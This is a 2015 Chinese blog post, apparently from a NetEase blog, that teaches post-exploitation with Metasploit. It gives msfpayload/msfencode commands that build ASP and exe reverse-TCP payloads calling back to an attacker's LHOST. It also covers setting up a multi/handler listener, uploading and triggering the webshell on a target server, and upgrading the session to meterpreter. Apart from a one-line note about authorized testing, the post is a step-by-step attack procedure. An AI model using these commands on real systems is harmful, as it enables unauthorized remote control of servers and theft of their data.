注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

metasploit 之webshell提权  

2015-01-22 20:03:16|  分类: Linux |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
本文所涉及的方法只能在已授权的机器上做测试。
    首先建议一下到网上查查meterpreter的用法在看这篇文章,理解为什么要使用msf来提权(因为msf里边有个meterpreter很强大 ^_^)
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用。
  下面是具体的利用方法。
  我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,只不过这里生成的是一个网页脚本文件:
产生webshell
msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp
然后将此webshell上传到服务器(这个步骤要有上传权限。)
然后启动msfconsole
输入use exploits/multi/handler,
set PAYLOAD windows/meterpreter/reverse_tcp(这里的payload要和前边的msfpayload所使用的一样。
set LHOST your_ip,
执行exploit,
然 后访问webshell的url,这里使用curl 访问curl http://host/webshell.asp ,如果exploit执行成功的话就可以看到msfconsole中有返回meterpreter shell,如果meterpreter不会用网上查一下,很多。
但是我使用netbox 搭建asp环境老是执行出错,希望读者在实际验证不出错后再使用。
    这里产生的是asp的webshell 也可以产生php webshell,jsp webshell 需要在msfencode时用-t 参数指定脚本类型,我认为php类型的webshell更容易成功。

    另外如果获取服务器拥有可以上传并且执行上传文件的权限的话,可以上传一个msfpayload产生的后门,设置监听,然后执行后门,返回一个 session然后将session转为meterpreter,这样就可以方便的使用meter各种特性了。给个步骤:(前提在上边以及说明了)
1、msfpayload windows/shell_reverse_tcp LHOST=your_ip R | msfencode -t exe -o test.exe
2、打开msfconsole (另外开一个terminate终端)
3、设置监听(监听这个词好像很高级,别被它吓到):use exploits/multi/handler,set LHOST=your_ip,执行exploit
4、将test.exe 上传到服务器
5、在服务器上执行test.exe 就可以返回一个shell了。
6、将windows shell 转成 meterpreter shell:由于使用的payload是shell_reverse_tcp,看名字就知道了返回一个shell,可以在监听器看到返回了一个 windows shell(windows 命令提示符),而不是一个meterpreter shell,这样就要转换了,方法是 按下Ctrl + z 使 windows shell 后台运行,然后sessions 指令查看 shell 的session是多少
,然后执行 sessions -u number(number为你找到的windows shell session号。这样就产生了一个meterpreter shell,可以利用meterpreter强大的功能。也有可能出错,仔细看出错信息然后复制其一部分google一下。
    可能读者些疑问:既然可以在上传执行exe文件,为什么要用msf呢,直接上传一个强大木马不是更方便么。我想说因为msf 中有个强大的Meterpreter。
    总结,可以发挥想象,挨个试试payloads有的payloads 不能用,也许有意外的发现。
  评论这张
 
阅读(74)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017